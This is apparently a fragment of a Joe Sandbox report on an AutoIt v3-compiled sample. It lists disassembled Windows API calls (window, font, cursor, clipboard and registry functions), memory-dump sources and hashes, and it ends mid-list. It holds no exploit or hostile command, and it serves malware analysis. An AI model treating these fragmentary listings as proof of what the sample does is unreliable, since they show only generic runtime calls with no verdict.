                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 4040870279-2373415609
                                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                        • String ID:
                                                                                        • API String ID: 69173610-0
                                                                                        • Opcode ID: 2ab26cce066401e69105f7e3b9d145bde90cc24b4a71a4e97715bb04ca8b3d86
                                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                        • Opcode Fuzzy Hash: 2ab26cce066401e69105f7e3b9d145bde90cc24b4a71a4e97715bb04ca8b3d86
                                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-517079104
                                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-3360698832
                                                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load
                                                                                        • String ID:
                                                                                        • API String ID: 1675784387-0
                                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                        APIs
                                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1582027408-0
                                                                                        • Opcode ID: 33e13a8604b0ac370441ec01772595ef8ba084b0830578ad9c621e61740d3e8b
                                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                        • Opcode Fuzzy Hash: 33e13a8604b0ac370441ec01772595ef8ba084b0830578ad9c621e61740d3e8b
                                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseConnectCreateRegistry
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 3217815495-966354055
                                                                                        • Opcode ID: f6d37d8d559e52bfa15f189e2aed2fd01b12aefbdc01d914b6e3868fc9f48453
                                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                        • Opcode Fuzzy Hash: f6d37d8d559e52bfa15f189e2aed2fd01b12aefbdc01d914b6e3868fc9f48453
                                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                        • String ID: ($,$tooltips_class32
                                                                                        • API String ID: 225202481-3320066284
                                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                        • String ID:
                                                                                        • API String ID: 15083398-0
                                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
